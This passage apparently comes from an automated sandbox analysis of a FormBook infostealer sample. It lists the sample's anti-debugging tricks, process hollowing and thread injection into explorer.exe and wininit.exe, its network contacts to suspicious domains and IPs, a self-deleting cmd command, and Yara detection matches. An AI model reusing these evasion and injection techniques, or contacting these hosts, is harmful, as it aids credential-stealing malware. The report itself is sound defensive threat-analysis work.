Source: explorer.exe, 00000006.00000000.493389114.00000000045D6000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Pcportk28.exe, 00000004.00000002.486604064.00000000025B1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\Pcportk28.exe

Code function: 5_2_004088D0 rdtsc

5_2_004088D0

Enables debug privileges

Source: C:\Users\Public\Pcportk28.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Process token adjusted: Debug			Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\Public\Pcportk28.exe	Code function: 5_2_008626F8 mov eax, dword ptr fs:[00000030h]		5_2_008626F8
Source: C:\Windows\SysWOW64\wininit.exe	Code function: 7_2_025326F8 mov eax, dword ptr fs:[00000030h]		7_2_025326F8

Checks if the current process is being debugged

Source: C:\Users\Public\Pcportk28.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Users\Public\Pcportk28.exe

Code function: 5_2_00409B40 LdrLoadDll,

5_2_00409B40

Creates guard pages, often used to prevent reverse engineering and debugging

Source: C:\Users\Public\Pcportk28.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.executive-air.net
Source: C:\Windows\explorer.exe	Domain query: www.bitcointradel.com
Source: C:\Windows\explorer.exe	Network Connect: 162.0.209.73 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.freeadakahamazon.com
Source: C:\Windows\explorer.exe	Network Connect: 118.67.131.217 80			Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.fisioletsgo.com
Source: C:\Windows\explorer.exe	Domain query: www.luckyfandom.com
Source: C:\Windows\explorer.exe	Network Connect: 216.239.34.21 80			Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80			Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\Public\Pcportk28.exe

Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 6F0000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\Public\Pcportk28.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\Public\Pcportk28.exe

Memory written: C:\Users\Public\Pcportk28.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\Public\Pcportk28.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\Public\Pcportk28.exe	Thread register set: target process: 1764			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Thread register set: target process: 1764			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Process created: C:\Users\Public\Pcportk28.exe C:\Users\Public\Pcportk28.exe			Jump to behavior
Source: C:\Windows\SysWOW64\wininit.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\Public\Pcportk28.exe"			Jump to behavior

May try to detect the Windows Explorer process (often used for injection)

Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.503184822.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.549085404.0000000000255000.00000004.00000020.sdmp	Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.549264912.0000000000750000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.503477440.0000000000750000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\Public\Pcportk28.exe	Queries volume information: C:\Users\Public\Pcportk28.exe VolumeInformation			Jump to behavior
Source: C:\Users\Public\Pcportk28.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior

Queries the cryptographic machine GUID

Source: C:\Users\Public\Pcportk28.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match	File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match	File source: 5.2.Pcportk28.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.Pcportk28.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.36cb410.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.Pcportk28.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Pcportk28.exe.3722430.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.691732540.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.691708361.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.484507114.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.510593702.00000000098A9000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.484190215.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.691749486.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519475611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.486832493.0000000003589000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519314819.0000000000320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.519405441.0000000000350000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.502411126.00000000098A9000.00000040.00020000.sdmp, type: MEMORY